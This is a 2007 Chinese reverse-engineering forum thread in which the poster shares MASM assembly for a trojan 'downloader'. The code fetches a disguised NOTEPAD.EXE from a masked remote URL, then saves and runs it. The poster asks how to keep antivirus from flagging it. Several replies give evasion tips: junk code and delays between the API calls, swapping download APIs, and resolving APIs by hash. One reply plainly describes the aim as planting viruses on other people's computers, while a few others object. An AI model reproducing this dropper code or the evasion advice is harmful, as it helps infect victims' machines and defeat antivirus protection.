首页
社区
课程
招聘
汇编写的3K下载工具,放出代码
发表于: 2007-6-5 05:56 6049

汇编写的3K下载工具,放出代码

2007-6-5 05:56
6049
.386p
.model flat,stdcall
option casemap:none
include ThemidaSDK.inc
include d:\masm32\include\windows.inc
include d:\masm32\include\user32.inc
include d:\masm32\include\kernel32.inc
include d:\masm32\include\shell32.inc
include d:\masm32\include\urlmon.inc

includelib d:\masm32\lib\user32.lib
includelib d:\masm32\lib\urlmon.lib
includelib d:\masm32\lib\shell32.lib
includelib d:\masm32\lib\kernel32.lib

.data
  UrlAddr db 'http://www.*****.cn/NOTEPAD.EXE',0
  SaveFileAddr db 'C:\*****\NOTEPAD.EXE',0
.code
main:
invoke URLDownloadToFile,NULL,addr UrlAddr,addr SaveFileAddr,NULL,NULL
invoke ShellExecute,0,0,addr SaveFileAddr,0,0,SW_SHOW
invoke ExitThread,0
end main

这样会被认为病毒文件被宰掉.
我用OD手工加密+花都不行,还是被宰.不知谁有高招.请指点.

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (10)
雪    币: 255
活跃值: (207)
能力值: ( LV9,RANK:250 )
在线值:
发帖
回帖
粉丝
2
到处都是.
你google搜索: 下载者 asm
2007-6-5 07:47
0
雪    币: 413
活跃值: (637)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
3
杀了好,免得又出一木马,技术是可以探讨的,只是玩马就不好了.
2007-6-5 07:48
0
雪    币: 218
活跃值: (42)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
改源码啊 汗死
2007-6-5 09:40
0
雪    币: 45
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
这一点代码就3K  真搞笑
2007-6-5 12:03
0
雪    币: 325
活跃值: (97)
能力值: ( LV13,RANK:530 )
在线值:
发帖
回帖
粉丝
6
同意.....
2007-6-5 14:31
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
探讨是可以,当吗就不好了
2007-6-5 15:39
0
雪    币: 216
活跃值: (40)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
8
URLDownloadToFile和ShellExecute2个API函数连用的话肯定会被杀的.这两句中间可以随便添加一点垃圾代码,最好加个延时.

申明:小弟只研究病毒木马而已
2007-6-5 16:57
0
雪    币: 339
活跃值: (1510)
能力值: ( LV13,RANK:970 )
在线值:
发帖
回帖
粉丝
9
那就换个api吧,什么internetopenfile之类的,写木马的不是好多手段么,一个一个试,总有一种可以往人家电脑下载个病毒的。
2007-6-5 17:00
0
雪    币: 219
活跃值: (15)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
URLDownloadToFile容易被杀的
2007-6-6 09:23
0
雪    币: 6075
活跃值: (2236)
能力值: (RANK:1060 )
在线值:
发帖
回帖
粉丝
11
自己写个getprocaddress用hash获取api
3k的空间你都用来对齐了
2007-6-6 13:23
0
游客
登录 | 注册 方可回帖
返回
//